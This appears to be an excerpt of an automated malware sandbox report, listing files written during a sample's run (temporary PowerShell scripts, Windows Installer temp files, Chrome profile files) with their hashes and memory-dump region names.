SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr577D.ps1

MD5 ee2199bb6dcffffec2a60eefbef7b969
SHA1 292d270b09b04000c8c6be8fc659178d936005e5
SHA256 2e18ad68d2cb41d3bcd1c0d1d6a417023bcf6b8fd798e308163dc498fc70f1ee
SHA512 bc70da13c576091e52f8d4fbec16c58482a886eb7c2004f25836b87438bdd4c334b73e13bd9bf53a781baced868487325394d4ba4ba81b0df16529ee1d787d0f

memory/5000-659-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/5000-661-0x000001FA6BB20000-0x000001FA6BB30000-memory.dmp

memory/5000-662-0x000001FA6BB20000-0x000001FA6BB30000-memory.dmp

memory/5000-695-0x000001FA6BB20000-0x000001FA6BB30000-memory.dmp

memory/5000-705-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6d79111bebb38571adee23cff9cb836
SHA1 e91bd98f439584eec1fcd7b4a5d7f3f9aad864bb
SHA256 346224c55c21d7e4e011e608e1a80b8c748833b69ec7273e075440cb00e02efc
SHA512 fc49c58eb2ba2e7599bf94bf09760a949b8951817657116b5d5701a688e80e7b79771fd8417ef03b73c06e3082823e3b76dff2d137dc9454a54e3bf2b4fc54dd

memory/828-736-0x0000026A2F4D0000-0x0000026A2F4E0000-memory.dmp

memory/828-737-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

\Windows\Installer\MSI68FD.tmp

MD5 3965d073a05f6d86906ba705d9e87ca2
SHA1 1acb0c99dd1e9add872c28d3e9bbb2383dd02d57
SHA256 d32b87f251222bb12fe4886f1b670ab9be151c2d981a379258d16b150373aee0
SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

C:\Windows\Installer\MSI68FD.tmp

MD5 3965d073a05f6d86906ba705d9e87ca2
SHA1 1acb0c99dd1e9add872c28d3e9bbb2383dd02d57
SHA256 d32b87f251222bb12fe4886f1b670ab9be151c2d981a379258d16b150373aee0
SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/3444-751-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/3444-752-0x000002399DFB0000-0x000002399DFC0000-memory.dmp

memory/3444-753-0x000002399DFB0000-0x000002399DFC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6d79111bebb38571adee23cff9cb836
SHA1 e91bd98f439584eec1fcd7b4a5d7f3f9aad864bb
SHA256 346224c55c21d7e4e011e608e1a80b8c748833b69ec7273e075440cb00e02efc
SHA512 fc49c58eb2ba2e7599bf94bf09760a949b8951817657116b5d5701a688e80e7b79771fd8417ef03b73c06e3082823e3b76dff2d137dc9454a54e3bf2b4fc54dd

C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr6BA6.ps1

MD5 bc163db1a8428962062548afaa6843c7
SHA1 88257fb1cbfebadde82923d6ec52fb9df7833a4c
SHA256 1d605afa29476fe635d26fcaf741dc0aee4aeb33c6d247630aa746b65cff77f6
SHA512 3ef0bef0d4f007d392f57751809eff9e9aa3e1b9afbd116a98a204d45d91bdb882a0ca5965f4c6b232815743f1f32a44d2c2e68437a10821ab339f288b8a2bd4

memory/3464-781-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/3464-783-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-782-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-802-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-803-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-812-0x000001BA21080000-0x000001BA21090000-memory.dmp

memory/3464-835-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f85f1914b1c3bbef30f39bd08363f595
SHA1 04f9312f78bca050562d9a39e90ff5666dc1fa93
SHA256 81016116978995c668e9ce7a047d592a72f5946fc02728a6cd133dc2df92ab6f
SHA512 ae2d590df1f737967914a2d5e000069aeb9e97107def9e50a4bfe8d4566af236d60347762636ef2183c615d2212e27f860d3915452353f1b7cf15643051ef609

memory/3444-862-0x000002399DFB0000-0x000002399DFC0000-memory.dmp

memory/3444-867-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

C:\Windows\Installer\MSI7EF7.tmp

MD5 3965d073a05f6d86906ba705d9e87ca2
SHA1 1acb0c99dd1e9add872c28d3e9bbb2383dd02d57
SHA256 d32b87f251222bb12fe4886f1b670ab9be151c2d981a379258d16b150373aee0
SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

\Windows\Installer\MSI7EF7.tmp

MD5 3965d073a05f6d86906ba705d9e87ca2
SHA1 1acb0c99dd1e9add872c28d3e9bbb2383dd02d57
SHA256 d32b87f251222bb12fe4886f1b670ab9be151c2d981a379258d16b150373aee0
SHA512 0855cd343073e017f8898a6b51e688ff9a4c851ec4c14b108a1ad9aa57e9bf68bbe0a08ecc33de63b1cee90f123ddc95f39ca87cc493d020a6c1a4061c114226

memory/3732-880-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/3732-883-0x0000014F3DBB0000-0x0000014F3DBC0000-memory.dmp

memory/3732-882-0x0000014F3DBB0000-0x0000014F3DBC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f85f1914b1c3bbef30f39bd08363f595
SHA1 04f9312f78bca050562d9a39e90ff5666dc1fa93
SHA256 81016116978995c668e9ce7a047d592a72f5946fc02728a6cd133dc2df92ab6f
SHA512 ae2d590df1f737967914a2d5e000069aeb9e97107def9e50a4bfe8d4566af236d60347762636ef2183c615d2212e27f860d3915452353f1b7cf15643051ef609

C:\Users\Admin\AppData\Local\Temp\pss7F64.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

C:\Users\Admin\AppData\Local\Temp\scr7F52.ps1

MD5 7ab7f92ab2847dcb1f0b77d5e491b0c1
SHA1 10335ed88adf16a0730f9a000a31b065a62dab2d
SHA256 68bafb05f381355f9e20b24b492682969dbfb49aca96d214f497dc8a8ed9f7a7
SHA512 76849524f4e2a43305ca4c921fff3a4d0ca389f8fe17ef6ce273700cdd6c7e28854fbb9eb9ea0adb8082212c4477daa58a9d013c50ac3673900317709467fe4e

memory/460-910-0x00007FFDC2370000-0x00007FFDC2D5C000-memory.dmp

memory/460-911-0x000001CAF9A60000-0x000001CAF9A70000-memory.dmp

memory/460-913-0x000001CAF9A60000-0x000001CAF9A70000-memory.dmp

\??\pipe\crashpad_2100_NOHUQUKXWOMSAQCZ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 78067c3cba08d378fd0c76bbb351fbf3
SHA1 3a5fd18bfc84fc0993cba765cd3ee45ee6d1c5d3
SHA256 12f5052360788fccf9f6e3dde50d6f593a7d2b84c2efd11bf34b95e3bdef6899
SHA512 95c8ecc257492f756299dd5aea3bdd7881b7a4f2e0cea239639e8870c7fe6706a9d6db9de07db7cbb8801b189e858502f0191d98108330d10b7fa370e9da3044

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 662820d0c1240d53a0f0a9f5446920c4
SHA1 342bc623537c132d216d72df6252b392e04d4d06
SHA256 901c2fcfd25eb1710dd215f2f685f70249d069910ea437c282073f4e65b7bf26
SHA512 018c6c2b30a2a900e475b377f684f86679c5e2c74f3835d4ab83ee91fca87b8e43ffcaa5496da8e914ad7f87c631d2520da60435f9aae0ce8f9b1a90149ae695

memory/4060-1083-0x00000000039B0000-0x0000000003B45000-memory.dmp

memory/4060-1084-0x00000000039B0000-0x0000000003B45000-memory.dmp

memory/4060-1085-0x00000000039B0000-0x0000000003B45000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e5370f97fe2fcddc5980ce258e23f4ab
SHA1 84b2cc6d4a23c8c8561228881b5c240b117cc72a
SHA256 f9d03e8c023e371089499b4b8600daffc070dd5a35d5e2cac692ac4b105c0358
SHA512 074b7ed63ed4a1c2b674842e1c8eaf3b258f8e4370d75b81d070235496ee3197c5d4d50c287146ef19fd3f0844e94a6018fb881bedfb53c63ee3a69edc681195

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 19131829b446578460ec4f0c373b61ff
SHA1 57fabf8435d946d577487f493922682d9e2e7903
SHA256 c1066bfe508c8e6b3368d9497213e83b47646593afac6aba1610d8ae9c2e6edd
SHA512 6518d4a8e94ec70554bb0af7d3db32bc0fe1567c6b2f60426819011a28ed616ab4c44138891f3a54fdc61fbf241a05d9744fee8af9b8e4189568afa11f26965f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a6af17ad87a6e824cfd644fc2829dc83
SHA1 e9dff8e98a2d8674cd6aaac18987eff7c9f4df83
SHA256 8c50baa52593a2b1635eb6278dec42c541c2e7ca5346623296db635990acdcda
SHA512 91a2575998ae83ed28969887d17d6e556418adb5f7866f557c3f556df5e60363dd872ba489f240d750e55a93ecd4077ffa4aa9ea37785d6725c8137f1d124e9c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b6af79cf3a3cc4fc33a28e171b3fc8fc
SHA1 f6bf51855cee7365ea954f5cbbbbeaaaa5f98d69
SHA256 046e40474e88cd704e411ec84ab07cbf444b1395882b01e559840e6a60c880d7
SHA512 d8697180a695b82e7b180b5b29cdb05549b2c6951b6126fe720e91efc5774a753b5dda096a9940d4f021cd242d6259cb2d521e049f7c9ae02cc4df0645a358fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 97c62f0e555d9d88ec5b1ec912dc4de1
SHA1 da77c7de7b9725ba50eecbedb55afe8f187d08d0
SHA256 300171088b059aa10e412e1a85479e6fe5a7f356537a070bbd6897f0c5fb428b
SHA512 b09407abbbe72d66f2468db2bfea511714ae5d90173c5d5cd3b999dac31223d1f922dc3778d3d9de53db3255b49532bb23c9468d77c06b0fe1d7879ae867e018

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 c187c41fb74b9d7aab6e200571c0a4a9
SHA1 76da5852e7b3a69d4d5f558a95ef634a6d514418
SHA256 abc0d8520123380bdb999af86290ccf384192a7a6b5afb5fc13983cea0a6bfc1
SHA512 2031614197ae0a2daf75e249174053698f32099d6e164fb972086628741e13604852dba0d241374320ea9cd087fa9280dce338818f0f51daa61c65f57ca7b7dc